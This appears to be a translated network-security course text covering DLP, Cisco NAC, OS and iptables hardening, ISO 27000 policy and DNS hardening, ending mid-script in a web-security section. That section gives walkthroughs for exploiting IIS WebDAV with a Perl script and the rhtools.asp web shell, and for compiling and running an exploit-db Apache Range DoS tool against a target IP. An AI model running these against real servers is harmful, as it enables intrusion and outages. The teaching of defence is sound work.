- Application management
- Hardware device management (USB, CD-ROM, ...)
- Data management
- Data encryption
- Monitoring and logging of data access

Below I present a DLP solution from Symantec:

DLP is becoming ever more important because organizations today are very concerned with, and focused on, building security measures around their critical information. To help customers protect sensitive data more effectively, Symantec's open DLP platform helps them leverage the content awareness of an enterprise-wide security deployment, while taking important steps to secure data and prevent its loss.
Symantec Data Loss Prevention 10 lets enterprises apply content-based encryption and enterprise rights management (ERM), and integrates easily with other Symantec solutions.
Content-based encryption and ERM
The new FlexResponse feature of Symantec Data Loss Prevention 10 helps the enterprise security team apply policy-based protection, including encryption or ERM, to files containing important data. Today, combining DLP with other IT solutions must be done by hand.
Through partnerships with other leading third-party vendors, such as GigaTrust, Liquid Machines, Oracle and PGP Corporation, Symantec offers customers a variety of integrated protection options.
For example, a company that currently allows only a few people to access information about a merger can easily apply its DLP policy to classify that data, and use Microsoft Active Directory Rights Management Services (ADRMS) to apply ERM to copies of it, providing very effective, seamless protection.
Increasing the usability of DLP intelligence
New support for XML and web services lets Symantec Data Loss Prevention 10 send DLP data to any application or reporting system, including enterprise security dashboards and compliance solutions such as the Symantec Control Compliance Suite.
For example, an e-commerce site can start by using DLP to identify the servers holding data subject to the PCI DSS rules. By sending this information to Symantec's Control Compliance Suite, those servers are prioritized for more frequent checks, with tighter control over the areas where important data is stored.
New policy import/export features let organizations keep their policies up to date with new regulations, and link and exchange policies with many other users to share best practices.

Seamless integration with other Symantec solutions
New integration with Symantec Workflow lets DLP 10 users carry out policy-driven actions such as locking an endpoint or encrypting automatically with Symantec Endpoint Encryption, Symantec Endpoint Protection and other security products from Symantec and from other vendors.
For example, if an employee tries to copy confidential information to a USB drive, Symantec Data Loss Prevention can tell Symantec Endpoint Protection to lock the USB port in a single action.
Users of SaaS (software-as-a-service) email security such as MessageLabs Hosted Email Encryption (a hosted service from Symantec) can also monitor, protect and securely deliver confidential information in outbound email without running their own email gateway infrastructure.
Services, languages and availability
Symantec Data Loss Prevention services help customers get measurable results from a DLP deployment, together with the knowledge and experience needed to keep tuning the solution over time. Combined with consulting services and other leading data-loss-prevention technologies, Symantec gives customers an in-depth analysis of their exposure to information leakage both inside and outside the enterprise, and a quantitative view of how much data actually moves across the network, into web applications and onto endpoints.
Symantec Data Loss Prevention 10 also has policy and detection support for 25 languages, with fully localised Japanese, Simplified Chinese and French editions, so that users of those languages can write policies, manage and handle incidents, and administer the system in their own language.
14. Network Access Control
To make sure that a user connecting to the network is not about to attack it, the endpoint has to be checked, assessed and given a verdict before it is let in.
Example: a visitor arrives at your company and joins the Wi-Fi network. By default the visitor cannot reach the internal network. To get there the machine must pass a series of checks: 1. an agent is installed to check whether the computer meets the security requirements; 2. the NAC gateway applies its policy to decide which network zones the computer may reach.
Below is an article on Cisco NAC; other vendors' systems work in a similar way:
Cisco NAC is a straightforward way to deploy Network Admission Control in a network so that security policy is enforced on every device that accesses network resources. With NAC, administrators can authenticate, authorise and assess wired, wireless and remote-access users. It recognises devices such as laptops, IP phones and game consoles, applies security policy to them and blocks the risks hidden in the user's access to data.
What Network Admission Control does
Virus infection of data on the network is a problem that deserves proper attention; viruses have an ever larger impact on systems. Making sure that the resources in use are free of infection is a requirement that must be met, and Network Admission Control with effective anti-virus checking is one solution.
Cisco NAC checks the state (posture) of client machines before they are admitted to the network. NAC works with an anti-virus program: the conditions and policies that have been set up are applied to the clients before they reach network resources.
NAC makes sure that the clients on the network always have the latest updates for their anti-virus software. If a client needs an update, NAC can deliver it directly as part of the client's update process. If a client suddenly shows signs of a virus that could affect the whole network, NAC moves the client to a completely isolated network segment until it has been checked thoroughly and is known to be free of viruses and other threats to the network.
How Network Admission Control works
A NAC deployment is built from several commonly used protocols and Cisco products and features, including:
- Cisco Trust Agent (CTA) and plug-ins
- Cisco IOS Network Access Device (NAD)
- Extensible Authentication Protocol (EAP)
- Cisco Secure Access Control Server (ACS) / Remote Authentication Dial-In User Service (RADIUS)
- Posture validation/remediation server
The CTA talks to the other software on the client through an application programming interface (API) and reports the client's state in response to requests from the NAD. The CTA is required for communication in a NAC deployment (it talks to the NAD using EAP over UDP). Software that ships with a Posture Plug-in (PP) exposes its state to the CTA; a PP is an agent implemented in a third-party product that enforces the policy for that product's state.
In current NAC deployments the NAD is the Layer 3 Cisco IOS software in the network device; it queries clients and enforces the verdict using EAP over UDP (EOU). The components of the NAC solution and how they fit together are shown in the figure below:

Figure: how NAC works, with the components interacting:
1. The client sends a packet to a NAC-enabled router.
2. The NAD starts the posture validation process using EOU.
3. The client sends its posture credentials to the NAD over EOU so that they can be validated.
4. The NAD forwards the message to Cisco Secure ACS using the RADIUS protocol.
5. Cisco Secure ACS requests posture validation from the validation server using the Host Credential Authorization Protocol (HCAP) inside an HTTPS tunnel.
6. The validation server replies with one of: pass, fail, quarantine.
7. To allow or deny access, Cisco Secure ACS sends a message with the corresponding ACLs/URL redirect.
8. The NAD passes the result to the client.
9. The client is allowed or denied access.


When a client requests access to the network (1), the NAD sends a "posture validation required" message (2). This is delivered to the CTA which, once the exchange is relayed to Cisco Secure ACS, sets up a Protected EAP (PEAP) session; the CTA then sends the client's posture credentials, collected by the PPs on the client, to the NAD (3), and they are forwarded to Cisco Secure ACS over RADIUS (4). Whether the client can be trusted is decided from the state of the software installed on it: Cisco Secure ACS validates the client by checking its state against the policies held in its database.
Cisco Secure ACS can also be configured to hand the validation request to an external server (5). That exchange uses HCAP inside an HTTPS tunnel. This is an option for client software that ships with a PP and a matching server for validating the client's state.
When an external server is used to validate the client's admission, it returns its validation result to Cisco Secure ACS. Cisco Secure ACS then combines the outcome of its own policies with the results checked on the external server and produces the combined verdict for the client. Cisco Secure ACS sends the Access Control List (ACL) for the client to the NAD, which enforces the policy on the client (8).
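The decision logic in steps 6 and 7 can be sketched in a few lines. The following is an added example, not Cisco code: the posture attributes, the signature-age threshold, the ACL strings and the remediation address are assumptions standing in for what the posture plug-ins report and what ACS would push to the NAD.

```python
from dataclasses import dataclass
from datetime import date

# Constructed posture report: what a posture plug-in might hand to the Cisco Trust
# Agent. The attribute names are assumptions for this example, not CTA's real ones.
@dataclass
class Posture:
    host: str
    av_installed: bool
    av_signature_date: date
    os_patched: bool
    infected: bool = False

# Policy held on the validation server (assumed threshold).
MAX_SIGNATURE_AGE_DAYS = 7

# What ACS hands the NAD for each verdict (assumed ACL text and remediation address).
REMEDIATION_SERVER = "10.0.0.50"
ACL_BY_RESULT = {
    "pass": ["permit ip any any"],
    "quarantine": [f"permit ip any host {REMEDIATION_SERVER}", "deny ip any any"],
    "fail": ["deny ip any any"],
}
REMEDIATION_URL = f"http://{REMEDIATION_SERVER}/update"
TODAY = date(2012, 6, 15)   # fixed "today" so the example is reproducible


def validate_posture(p: Posture, today: date = TODAY) -> str:
    """Step 6: the validation server's verdict, one of pass / fail / quarantine."""
    if p.infected:
        return "quarantine"          # isolate until cleaned and rechecked
    if not p.av_installed or not p.os_patched:
        return "fail"                # does not meet policy at all
    if (today - p.av_signature_date).days > MAX_SIGNATURE_AGE_DAYS:
        return "quarantine"          # stale signatures: only the update server is reachable
    return "pass"


def acs_decision(p: Posture, today: date = TODAY) -> dict:
    """Step 7: the message ACS returns to the NAD: verdict, ACL and, for quarantine, a redirect URL."""
    result = validate_posture(p, today)
    msg = {"host": p.host, "result": result, "acl": ACL_BY_RESULT[result]}
    if result == "quarantine":
        msg["url_redirect"] = REMEDIATION_URL
    return msg


def sample_clients():
    """Constructed endpoints covering every branch of the policy."""
    return [
        Posture("laptop-1", True, date(2012, 6, 14), True),
        Posture("laptop-2", True, date(2012, 5, 1), True),               # signatures 45 days old
        Posture("guest-pc", False, date(2012, 1, 1), False),
        Posture("laptop-3", True, date(2012, 6, 15), True, infected=True),
    ]


def run_all(today: date = TODAY) -> dict:
    """Run the four sample endpoints through the policy, keyed by host name."""
    return {c.host: acs_decision(c, today) for c in sample_clients()}


if __name__ == "__main__":
    for host, decision in run_all().items():
        print(host, decision)
```

The quarantine branch is the one worth getting right in a real deployment: its ACL must reach the remediation server and nothing else, or a machine with stale signatures can still touch the rest of the network while it "updates".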
15. Operating system security
a. Securing Windows
Use trustworthy hardware
There is now plenty of hardware (RAM, USB devices, hardware keyloggers, hard disks) that can be used to steal a user's data, so choosing genuine hardware of known origin matters on every platform.
Use a licensed copy of Windows
A licensed copy of Windows can receive security patches and direct vendor support, which makes the system safer.
Enable automatic updates
Turn on automatic updates so that security holes are patched as soon as fixes are available.
Enable the host firewall

The host firewall protects the computer against threats such as attacks on vulnerable services and worm outbreaks. Turn the firewall on and open only the applications and ports you know you need.
Lab: configure the firewall on a computer
Set strong passwords for all users
Users' habit of choosing simple passwords is a common way in for attackers. Windows passwords should be at least 7 characters long and mix digits, upper-case letters, lower-case letters and special characters.
Lab: configure an account policy for a computer
Encrypt the disk with Microsoft BitLocker
From Windows Vista onward, Windows can encrypt the whole disk. This prevents data loss if the computer is lost or stolen and also defeats offline attacks that bypass the machine's logon.
Install only software of known origin
Turn off all unnecessary services and applications
This also removes a good share of the ways the computer can be attacked.
Install endpoint protection (Endpoint Security)
Products such as Kaspersky, Symantec and Trend Micro monitor the whole machine, from I/O and disk reads and writes to network access. Most threats to an endpoint are caught by this software.
Use secure network services
Exchanging information over insecure protocols such as telnet, POP3, SMTP, FTP and HTTP exposes your username and password to anyone on the path. Choosing secure protocols is therefore essential to protecting the system.
Set up IPsec for insecure network services
When you must use services that send information in the clear, you can use IPsec to encrypt the traffic on the network. IPsec keeps the data protected in transit.
Create domain-wide Group Policy to enforce a consistent policy
Use the computer in a safe environment
Safe Internet habits and a complete set of protection measures.
b. Lab: use an IPsec policy to protect some applications on Windows
c. Securing Linux
Use a Linux distribution from a reputable vendor such as Red Hat, Ubuntu or a few others.
Keep the Linux kernel at the latest version.
Before deploying a new service, check which vulnerabilities it may have.
Install additional security software on the Linux machine (anti-virus, IDS/IPS, firewall).
Below is a brief overview of using iptables to protect a Linux machine.
The iptables firewall on Red Hat
Linux kernel 2.4.x arrived with many new features that made Linux more reliable and supported more devices. One of them was Netfilter/iptables support built into the kernel, which handles packets more efficiently than its predecessors, ipfwadm in kernel 2.0 and ipchains in kernel 2.2, while still supporting the old command sets. Packet-filtering firewalls built with ipfwadm or ipchains had several limitations: they lacked the hooks needed to extend their features, and packet filtering for ordinary protocols and Network Address Translation (NAT) were implemented completely separately and could not be combined. Netfilter and iptables in kernel 2.4 solve these limitations and add many features that ipfwadm and ipchains lack.
Introduction to iptables
Linux has many firewalls. Among them, two that are configured and run from the console, and are small and convenient, are iptables and ipchains.
Netfilter/iptables
Introduction
iptables was written by the Netfilter project to strengthen security on Linux systems. iptables is a very powerful packet-filtering firewall, built into Linux kernels 2.4.x and 2.6.x. Netfilter/iptables has two parts: Netfilter inside the Linux kernel and iptables outside it. iptables is the interface between the user and Netfilter: it pushes the user's rules into Netfilter for processing. Netfilter filters packets at the IP level. Because Netfilter works directly in the kernel it is fast and does not slow the system down. It was designed to replace ipchains (Linux 2.2.x) and ipfwadm (Linux 2.0.x), has more features than ipchains and is built more sensibly, with the following points:
What can Netfilter/iptables do?
- Build firewalls with both stateless and stateful packet filtering.
- Use the NAT table and masquerading to share network access when you do not have enough public addresses.
- Use the NAT table to set up a transparent proxy.
- Work together with iproute2 to build complex policy routing and QoS.
- Alter (mangle) the TOS/DSCP/ECN bits of the IP header.
- Track connections and check packets against many connection states. It does this for UDP and ICMP as well as for TCP, the best case. For example, stateful ICMP filtering lets echo replies in only when a request went out, instead of blocking requests but still accepting replies on the assumption that they must answer a ping we sent. An unsolicited echo reply can be a sign of an attack or of a backdoor.
- Simple handling of packets in the chains (lists of rules) INPUT, OUTPUT and FORWARD. On hosts with several network interfaces, packets moving between interfaces traverse only the FORWARD chain rather than all three.
- A clear separation between packet filtering and NAT (Network Address Translation).
- Rate limiting and logging. You can limit connection rates and log them to counter denial-of-service attacks.
- Filtering on TCP flags and on MAC addresses.
- As a stateful firewall it can follow a connection for its whole life, so it is safer than a firewall that keeps little or no state.
iptables has four tables (filter, nat, mangle and raw), each with built-in chains that carry a default policy.
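To make the stateful filtering, rate limiting, logging and masquerading points concrete, here is an added example (not from the original document) that generates an iptables ruleset for a host with a default-deny INPUT policy and, separately, the NAT rules for sharing one public address. The interface names, the admin network 192.168.1.0/24 and the open ports are assumptions. The script only builds the command lines, so it runs without root and without iptables installed, and the output can be reviewed before it is applied.

```python
def build_host_rules(open_tcp=(80, 443), ssh_port=22, admin_net="192.168.1.0/24",
                     log_prefix="IPT-DROP: "):
    """Return the iptables commands for a stateful, default-deny host firewall."""
    rules = [
        # Default policies: drop everything inbound or forwarded, allow outbound.
        "iptables -P INPUT DROP",
        "iptables -P FORWARD DROP",
        "iptables -P OUTPUT ACCEPT",
        "iptables -F INPUT",
        # Loopback traffic is always fine.
        "iptables -A INPUT -i lo -j ACCEPT",
        # Stateful core: replies to connections we opened, plus RELATED ones
        # (ICMP errors, FTP data). Must come before the per-port rules.
        "iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT",
        # A packet claiming to open a TCP connection without SYN is a scan or bogus.
        "iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP",
        # Ping: accept requests at a limited rate; replies to our own pings are ESTABLISHED.
        "iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 5/s -j ACCEPT",
    ]
    # Public services: only the first packet of a connection needs a rule.
    for port in open_tcp:
        rules.append(f"iptables -A INPUT -p tcp --dport {port} -m state --state NEW -j ACCEPT")
    # SSH only from the admin network, rate-limited against password guessing:
    # more than 4 new connections in 60 seconds from one address are dropped.
    ssh = f"iptables -A INPUT -p tcp --dport {ssh_port} -s {admin_net} -m state --state NEW"
    rules += [
        f"{ssh} -m recent --set --name SSH",
        f"{ssh} -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP",
        f"{ssh} -j ACCEPT",
        # Log what is about to hit the DROP policy, rate-limited so logging cannot be used for DoS.
        f'iptables -A INPUT -m limit --limit 10/min -j LOG --log-prefix "{log_prefix}" --log-level 4',
    ]
    return rules


def build_nat_rules(lan_if="eth1", wan_if="eth0"):
    """NAT table: masquerade the LAN behind the single address on the WAN interface."""
    return [
        "sysctl -w net.ipv4.ip_forward=1",
        f"iptables -t nat -A POSTROUTING -o {wan_if} -j MASQUERADE",
        # Forwarding is stateful too: LAN may open connections out, WAN only gets replies back.
        f"iptables -A FORWARD -i {lan_if} -o {wan_if} -j ACCEPT",
        f"iptables -A FORWARD -i {wan_if} -o {lan_if} -m state --state ESTABLISHED,RELATED -j ACCEPT",
    ]


def to_script(rules) -> str:
    """Render the rule list as a shell script that can be reviewed and then run as root."""
    return "#!/bin/sh\nset -e\n" + "\n".join(rules) + "\n"


if __name__ == "__main__":
    print(to_script(build_host_rules() + build_nat_rules()))
```

Rule order is the point of the example: the ESTABLISHED,RELATED rule sits before every per-service rule so that reply traffic is handled by state rather than by opening ports, and the LOG rule is last so that only packets about to be dropped by the policy are logged.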
ipchains
One of the programs Linux uses to configure the kernel's packet-filtering and masquerading rules is ipchains. The ipchains package comes with two helper scripts (ipchains-save and ipchains-restore) that simplify administration. ipchains is used to set up, maintain and inspect the IP firewall rules in the Linux kernel. The rules are grouped into chains:
- the input chain (rules applied to packets arriving at the firewall);
- the output chain (rules applied to packets generated locally on the firewall and leaving it);
- the forward chain (rules applied to packets forwarded through the firewall to another host or network);
- and user-defined chains.
ipchains uses the concept of a chain to process packets. A chain is a list of rules used to handle packets of one kind: incoming, forwarded or outgoing. The rules say what action is taken for a packet. The entries in the masquerading table are pairs of addresses (the rewritten connections) rather than individual IP addresses.
A firewall rule specifies the packet criteria and a target. If a packet does not match, the next rule is examined; if it matches, the rule's target says what happens to it. The target can be a user-defined chain or one of the following built-in values: ACCEPT, DENY, REJECT, MASQ, REDIRECT or RETURN.
- ACCEPT: let the packet through.
- DENY: drop the packet silently.
- REJECT: like DENY, but the client is told that the packet was discarded.
- MASQ: only valid when the kernel was compiled with CONFIG_IP_MASQUERADE. The packet is masqueraded as if it originated from the local machine; reply packets are recognised and automatically demasqueraded, bypassing the forward chain.
- REDIRECT: only valid when the kernel was compiled with CONFIG_IP_TRANSPARENT_PROXY. The packet is redirected to a local socket even though it was addressed to a remote host.
- RETURN: stop traversing this chain; in a user-defined chain processing continues in the calling chain, in a built-in chain the chain's policy applies.
Commonly used syntax:
  ipchains -[ADC] chain rule-specification [options]
  ipchains -[RI] chain rulenum rule-specification [options]
  ipchains -D chain rulenum [options]
  ipchains -[LFZNX] [chain] [options]
  ipchains -P chain target [options]
  ipchains -M [-L | -S] [options]

16. Network security policy
a. Requirements for building a network security policy
Security for a network infrastructure covers four areas:
- security theory;
- attack skills;
- skills for configuring defences;
- writing an information security policy.
Writing a network security policy is the step that completes a working environment that operates to a security standard. Many organisations in Vietnam are now building their security policies around ISO 27001, using the ISMS model.
b. Overall process for building a policy:
Plan
- Define the objectives
- Identify and quantify information security risks
- Identify the compliance requirements
- Write the policy
Do
- Design the system
- Deploy the policies and measures that protect the infrastructure
- Install servers securely
- Install workstations securely
- Install the information security protection applications
Check
- Test and assess information security
- Monitor and audit the system during operation
Act
- Maintain the system
- Upgrade where necessary
The figure shows the Plan-Do-Check-Act cycle.

c. The ISMS
Figure: model of an ISMS.

d. The ISO 27000 series
When people speak of an ISMS they are referring to the ISO/IEC 27000 series as a whole, not to any single standard.
The 27000 series has 21 standards, but the central idea sits in ISO/IEC 27001: continual improvement.
The ISO 27000 series includes:
* ISO/IEC 27000 - ISMS overview and vocabulary
* ISO/IEC 27001 - ISMS requirements
* ISO/IEC 27002 - Code of practice for information security management
* ISO/IEC 27003 - ISMS implementation guidance
* ISO/IEC 27004 - Information security management measurement
* ISO/IEC 27005 - Information security risk management
* ISO/IEC 27006 - Requirements for bodies providing audit and certification of an ISMS
* ISO/IEC 27011 - Information security management guidelines for telecommunications organisations
* ISO 27799 - Information security management in health using ISO/IEC 27002
* ISO/IEC 27007 - Guidelines for ISMS auditing
* ISO/IEC 27008 - Guidance for auditors on ISMS controls
* ISO/IEC 27013 - Guidance on the integrated implementation of ISO/IEC 20000-1 and ISO/IEC 27001
* ISO/IEC 27014 - Governance of information security
* ISO/IEC 27015 - Information security management guidelines for financial services and insurance
* ISO/IEC 27031 - Guidelines for ICT readiness for business continuity
* ISO/IEC 27032 - Guidelines for cybersecurity
* ISO/IEC 27033 - IT network security
* ISO/IEC 27034 - Guidelines for application security
* ISO/IEC 27035 - Security incident management
* ISO/IEC 27036 - Guidelines for security in outsourcing
* ISO/IEC 27037 - Guidelines for identification, collection and/or acquisition and preservation of digital evidence
Some numbers in this series are missing (for example ISO 27012 for e-government) because those standards have not yet taken shape, or have not yet met the conditions for promotion to a full standard, which is decided by the ISO/IEC technical committee.
In addition, 27033 and 27034 have sub-standards, also called parts, such as 27033-1 and 27034-5.
Where do you start with an ISMS?
An ISMS has to start with learning the vocabulary (ISO 27000) used in ISMS work, so that everyone understands, thinks, expresses and presents things the same way, and one word is not read with several divergent meanings. Yet for lack of time or money, and sometimes out of sheer arrogance, many organisations skip this step.
The usual answer when the consultant asks for vocabulary training is "this is easy, we'll read it ourselves", but in practice hardly anyone does. Besides, the main purpose is not to understand the vocabulary but to give the whole staff the same understanding.
This is why ISMS projects so often collapse into mere formality: every person and every level of the organisation understands things differently. Newcomers are not trained either, so as employee turnover rises the original way of thinking and the original direction gradually fade.
Does an ISMS need to be certified, and why?
An ISMS does not have to be certified; nothing in the series requires it. ISMS certification is voluntary.
Many organisations wave an ISMS certificate about to impress others, but anyone who knows the standard finds this rather comical, because the certificate only expresses a commitment; it does not express value.
Where does the value of ISMS certification lie?
It lies in the reputation of the certification body and of its auditors. In this field there are auditors whose depth of expertise is below that of the organisation's own staff, which is why 27006 and 27008 regulate how audits are done.
For the same reason, large corporations do not need ISMS certification and assess themselves when they have good experts of their own.
After learning 27000, what next?
When auditors come to assess, they usually work from 27001. If the ISMS is only being implemented to tick a box, concentrating on 27001 is enough and there is no point in studying 27000.
If you really mean to implement it, concentrate on 27002:
1. Risk assessment
2. Security policy
3. Organization of information security
4. Asset management
5. Human resources security
6. Physical and environmental security
7. Communications and operations management
8. Access control
9. Information systems acquisition, development and maintenance
10. Information security incident management
11. Business continuity management
12. Compliance
How do you implement the 12 areas of the 27002 code of practice?
Implementing 27002 means starting a repeating cycle over the 12 areas above; that is, the 12 areas have to be built, and then built again.

This building follows 27003:
1. Introduction
2. Scope
3. Terms & Definitions
4. Structure of this Standard
5. Obtaining Management Approval for Initiating the Project to Implement an ISMS
6. Defining ISMS Scope and ISMS Policy
7. Conducting Organization Analysis
8. Conducting Risk Assessment and Risk Treatment Planning
9. Designing the ISMS
On the surface this looks like a purely management matter, but in practice the Organization Analysis part still lacks important links in the series, which ISO/IEC is still developing. That is why quite a few people mistakenly think an ISMS is only about management. I myself was wrong about this for a while.

IV. APPLICATION SECURITY
1. Securing DNS
The Domain Name System (DNS) maps host names to IP addresses on the Internet and on private TCP/IP networks. DNS servers are a frequent target for attackers, but you can harden them with the following measures:
a. Use DNS forwarders
A DNS forwarder is a DNS server that performs DNS queries on behalf of other DNS servers. It is used to take the processing load off the DNS servers that forward their queries to it, and to concentrate the DNS cache on the forwarder.
Another function of a DNS forwarder is to stop the DNS servers that forward to it from talking to DNS servers on the Internet themselves. This is especially important when a DNS server holds internal resource records for the organisation's DNS domain. Instead of letting the internal DNS servers perform recursion and contact other DNS servers, configure them to use a forwarder for all domains for which they are not authoritative.

b. Use caching-only DNS servers
A caching-only DNS server is not authoritative for any DNS domain. It is configured to perform recursion or to use a forwarder. When it receives a reply, it caches the result and passes the answer to the host that sent the query. Over time it builds up a cache of DNS replies that greatly reduces response times for its clients.
Caching-only DNS servers can improve the organisation's security when they are used as forwarders under your own administrative control. Internal DNS servers can be configured to use the caching-only server as their forwarder, and the caching-only server performs recursion on their behalf. Using your own caching-only servers as forwarders improves security because you no longer depend on your ISP's DNS servers as forwarders when you cannot trust the security settings on their servers.
c. Use DNS advertisers
A DNS advertiser is a DNS server that answers queries only for the domains for which it is authoritative. For example, if you host resource records for domain.com and corp.com, the public DNS server is configured with the zone files for domain.com and corp.com.
What sets a DNS advertiser apart from an ordinary DNS server hosting zone files is that it answers queries only for the domains it is authoritative for; it does not perform recursion for queries about other domains. This stops outsiders using your public DNS server to resolve arbitrary names, and improves security by removing the risks of running a public DNS resolver (cache poisoning).

d. Use DNS resolvers
A DNS resolver is a DNS server that can perform recursion to resolve names in domains for which it is not authoritative. For example, you may have an authoritative DNS server on the internal network for the internal domain internalcorp.com. When a workstation uses that server to resolve quantrimang.com, the server performs recursion by looking the result up on other DNS servers.
The difference between that server and a DNS resolver is that the resolver is dedicated to resolving Internet host names. The resolver can be a caching-only DNS server that is not authoritative for any domain. The administrator can make the resolver available only to internal users, or only to external users so that they do not have to rely on an external DNS server outside the administrator's control, or allow both internal and external users to use it.
e. Protect the DNS cache
DNS cache pollution is a common problem. Most DNS servers cache the results of DNS queries before returning the reply to the host that asked. The DNS cache greatly improves DNS query performance. If the server's cache is polluted with bogus DNS entries, users can be sent to malicious websites instead of the ones they meant to visit.
Most DNS servers can be configured to protect against cache pollution. For example, the Windows Server 2003 DNS server is configured against cache pollution by default. On a Windows 2000 DNS server you can enable the protection by opening the DNS server's Properties dialog, selecting the Advanced tab, ticking "Secure cache against pollution" and restarting the DNS server.
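The "secure cache against pollution" option works by accepting from a reply only the records that the answering server is entitled to assert, that is, names inside the zone (the bailiwick) for which that server is authoritative. The following added example, which is not from the original document and not a real resolver's code, applies that check to a constructed reply in which an attacker has slipped an extra record into the additional section, and also discards replies whose transaction ID or question does not match what was asked. All names and addresses are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    name: str
    rtype: str
    data: str
    section: str   # "answer", "authority" or "additional"


@dataclass(frozen=True)
class Reply:
    txid: int
    qname: str
    records: tuple


def _norm(name: str) -> str:
    return name.lower().rstrip(".")


def in_bailiwick(name: str, zone: str) -> bool:
    """True if name is the zone apex or a name below it."""
    name, zone = _norm(name), _norm(zone)
    return name == zone or name.endswith("." + zone)


def filter_reply(reply: Reply, sent_txid: int, sent_qname: str, server_zone: str):
    """Return (accepted, rejected). A reply that does not match the outstanding query is
    dropped whole; otherwise only records inside the answering server's bailiwick are kept."""
    if reply.txid != sent_txid or _norm(reply.qname) != _norm(sent_qname):
        return [], list(reply.records)          # spoofed or unsolicited reply
    accepted, rejected = [], []
    for rr in reply.records:
        (accepted if in_bailiwick(rr.name, server_zone) else rejected).append(rr)
    return accepted, rejected


# Constructed reply from ns.example.com (authoritative for example.com) to a query for
# www.example.com; the last record is the poisoning attempt.
SAMPLE_REPLY = Reply(
    txid=0x1A2B,
    qname="www.example.com.",
    records=(
        RR("www.example.com.", "A", "198.51.100.10", "answer"),
        RR("example.com.", "NS", "ns.example.com.", "authority"),
        RR("ns.example.com.", "A", "198.51.100.1", "additional"),
        RR("www.bank.example.", "A", "203.0.113.66", "additional"),   # out of bailiwick
    ),
)


def check_sample():
    """Run the sample reply through the filter as if we had sent txid 0x1A2B for www.example.com."""
    return filter_reply(SAMPLE_REPLY, 0x1A2B, "www.example.com", "example.com")


if __name__ == "__main__":
    ok, bad = check_sample()
    print("cached:", [r.name for r in ok])
    print("discarded:", [r.name for r in bad])
```

The bailiwick test is deliberately a suffix match on a dot boundary, so that a server for example.com cannot plant records for notexample.com either.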
f. Secure dynamic DNS (DDNS) updates
Many DNS servers accept dynamic updates. Dynamic update lets hosts that get their address from DHCP register their host name and IP address with the DNS server themselves. DDNS is a real help to administrators compared with configuring the resource records for those hosts by hand.
But dynamic updates that are not checked can be a security problem. An attacker can configure a machine to dynamically update the records of key servers (a file server, web server or database server) on the DNS server and redirect connections meant for those servers to their own PC.
You can reduce the risk of malicious DNS updates by requiring secure connections to the DNS server for dynamic updates. This is easy to do by configuring the DNS server to use Active Directory-integrated zones and to require secure dynamic updates. After that, all domain members can update their DNS information dynamically and securely.
g. Disable zone transfers
A zone transfer takes place between a primary DNS server and a secondary DNS server. Primary DNS servers that are authoritative for particular domains hold a writable zone file that is updated when needed. Secondary DNS servers receive a read-only copy of the zone file from the primary. Secondary DNS servers are used to improve DNS query performance within an organisation or on the Internet.
But zone transfers are not restricted to secondary servers. Anyone can send a DNS query to a server that allows zone transfers and dump its entire zone database. An attacker can use that information to reconnoitre the organisation's naming scheme and attack key infrastructure services. You can prevent this by configuring the DNS server to refuse zone transfer requests, or to allow zone transfers only to specific servers.
h. Use a firewall to control access to DNS
A firewall can be used to control who can connect to the DNS servers. For DNS servers that only serve queries from internal clients, configure the firewall to block connections from external hosts to those servers. For DNS servers used as caching forwarders, configure the firewall to accept DNS queries only from the DNS servers that use them as forwarders. One very important firewall policy setting is to block internal users from using the DNS protocol to connect to external DNS servers.
i. Set access controls on the DNS registry keys

On Windows-based DNS servers, access control should be configured on the registry keys for the DNS server so that only the accounts that need access can read or change them.
The DNS key under HKLM\SYSTEM\CurrentControlSet\Services should be configured to allow access only to administrators and the SYSTEM account, and those accounts should have Full Control.
j. Set access controls on the DNS file system folders
On Windows-based DNS servers, configure access controls on the file system folders belonging to the DNS server so that only the accounts that need access can read or change those files.
The %SystemRoot%\System32\DNS folder and its subfolders should allow access only to the SYSTEM account, which should have Full Control.
2. Securing web applications
a. Introduction
To attack a web server, a hacker normally starts by finding out which operating system it runs and which services run on it; the operating system is typically Windows 2000 Server, Windows 2003 Server, Red Hat and so on, and the services include Apache, IIS, FTP servers and so on. If any service of the operating system, or any other service, is vulnerable, the attacker can take control of the system. In this section's exercise the author demonstrates a vulnerability in the operating system (DCOM) and vulnerabilities in other applications (Serv-U, an FTP server, and Apache). Through these vulnerabilities the attacker can take complete control of the victim machine.
b. Vulnerabilities in web services
- vulnerabilities at the operating system layer;
- vulnerabilities in the web service (server software);
- vulnerabilities in the web application.

c. Exploiting OS-level vulnerabilities, and securing the web server at that level
Vulnerabilities in Windows or Linux mostly arise in services that allow remote access (RPC, SSH, Telnet).
Below is a Nessus scan report for the operating system (figure).
When a vulnerability rated High or above is present, the system can be fully compromised (figure):

Successful attack exploiting Microsoft vulnerability MS08-067 (figure)
Securing the web server at the OS layer
Apply the operating system hardening steps given earlier in this document to get a secure operating system.
d. Exploiting a vulnerability in the web service
Use ActivePerl, an exploit script (.pl) and a web shell, both of which are easy to find online, to exploit the IIS WebDAV vulnerability:
Step 1: install ActivePerl
Step 2: copy the attack script tocbatdat.pl
Step 3: upload the shell rhtools.asp

Step 4: access the server through the shell (figure)
To close this hole, run a web server version in which it has been patched.

e. Exploiting the DoS vulnerability in Apache 2.0.x-2.0.64 and 2.2.x-2.2.19
Many machines on the Internet still have this vulnerability. On an affected system a single command lets an attacker hang the web service. The fix shipped in Apache httpd 2.2.20 and later, so the remedy is to upgrade; at the time of writing many installations had not been updated.
Step 1: download the code from http://www.exploit-db.com/exploits/18221/
Step 2: save it as a C file named rcvalle-rapache.c
Step 3: compile it on Linux with
gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
Step 4: run it
Linux# ./rcvalle-rapache IP
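The exploit above works by sending a Range header with hundreds of overlapping byte ranges, which the vulnerable versions expanded in memory one by one. The workaround the Apache project published at the time was to reject requests carrying more than five ranges, and later releases added a MaxRanges directive. The following added example (not from the original document and not from the exploit) implements that check as detection logic over constructed HTTP requests, so an operator can spot the attack in a proxy, IDS or log pipeline; the threshold and the sample requests are assumptions.

```python
import re

RANGE_RE = re.compile(r"^\s*bytes\s*=\s*(.+)$", re.IGNORECASE)


def parse_ranges(value: str):
    """Parse 'bytes=0-499,600-' into [(0, 499), (600, None)]; None if not a byte-range header."""
    m = RANGE_RE.match(value)
    if not m:
        return None
    ranges = []
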